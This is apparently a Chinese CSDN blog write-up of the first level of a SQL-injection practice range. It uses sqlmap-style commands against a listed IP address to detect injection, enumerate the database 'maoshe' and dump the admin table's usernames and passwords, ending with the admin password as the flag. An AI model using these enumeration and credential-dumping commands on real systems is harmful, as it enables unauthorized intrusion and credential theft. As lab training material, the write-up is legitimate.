文章目录

• 一.查看是否有注入
• 二.查找当前数据库
• 三.查询数据库的表
• 四.查询表中的列
• 五.查询具体内容

一.查看是否有注入

使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch
-u指令为查看网址的url是否有漏洞。-batch为永远不要求用户输入信息，默认执行。

我们可以看到，存在sql注入漏洞。

二.查找当前数据库

mysql.py -u http://59.63.200.79:8003/?id=1 -current-db -batch
-cuurent-db 意思为查找当前的数据库信息，也可以用-dbs查找所有的数据库。

三.查询数据库的表

上面我们已知当前数据库为 maoshe，所以我们指定数据库查询表。
mysql.py -u http://59.63.200.79:8003/?id=1 -D “maoshe” -tables -batch
-D为指定数据库 -tables为查询当前数据库所在的表。
得出查询到的当前数据库表为admin dirs news xss4个。

四.查询表中的列

一般管理员的帐号密码都会在admin里面，所以我们可以查看下admin里面的字段。
mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -columns -batch
这里的-t为指定表，然后使用-columns 查看字段名称
我们可以得知，字段名称为id，password，username三个。所以我们提取username和password就可以了。

五.查询具体内容

使用 mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C “username,password” -dump -batch
这里的-C为指定字段名称，-dump代表查询出字段。
最后我们得出admin密码为helloback，这个就是本题的flag。

标签：sqlmap,神台,数据库,batch,查询,admin,mysql,第一关,id
来源： https://blog.csdn.net/weixin_44490353/article/details/111308759